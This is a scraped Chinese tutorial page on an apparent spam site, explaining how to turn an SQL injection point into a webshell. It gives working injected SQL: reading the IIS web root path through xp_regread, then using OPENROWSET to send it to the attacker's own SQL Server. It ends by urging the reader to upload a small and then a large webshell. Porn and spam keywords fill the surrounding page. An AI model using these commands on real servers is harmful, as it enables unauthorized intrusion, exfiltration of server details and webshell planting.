婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 滲透中用openrowset搞shell的方法

滲透中用openrowset搞shell的方法
熱門標簽:臨滄移動外呼系統哪家有 寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統 防城港市ai電銷機器人 怎么更改地圖標注電話 交行外呼系統有哪些 激戰黃昏地圖標注說明 不同的地圖標注 隨州銷售外呼系統平臺
滲透中用openrowset搞shell的方法 
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發現屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發送到遠程數據庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網站信息寫入數據庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數據庫 

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~ 

標簽:紅河 阜陽 哈密 忻州 無錫 青海 河源 沈陽

巨人網絡通訊聲明:本文標題《滲透中用openrowset搞shell的方法》,本文關鍵詞  滲透,中用,openrowset,搞,shell,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《滲透中用openrowset搞shell的方法》相關的同類信息!
  • 本頁收集關于滲透中用openrowset搞shell的方法的相關信息資訊供網民參考!
    • 推薦文章
    主站蜘蛛池模板: 喀什市| 丹阳市| 合阳县| 莎车县| 望谟县| 沾益县| 湘西| 府谷县| 南部县| 阿合奇县| 资中县| 华宁县| 襄汾县| 行唐县| 尉氏县| 元朗区| 唐海县| SHOW| 肃南| 汝阳县| 奉化市| 敦化市| 大余县| 永城市| 延津县| 新泰市| 孟连| 贵州省| 永春县| 化州市| 玉田县| 安塞县| 富裕县| 临湘市| 徐汇区| 新沂市| 三明市| 新丰县| 冕宁县| 临潭县| 梁河县|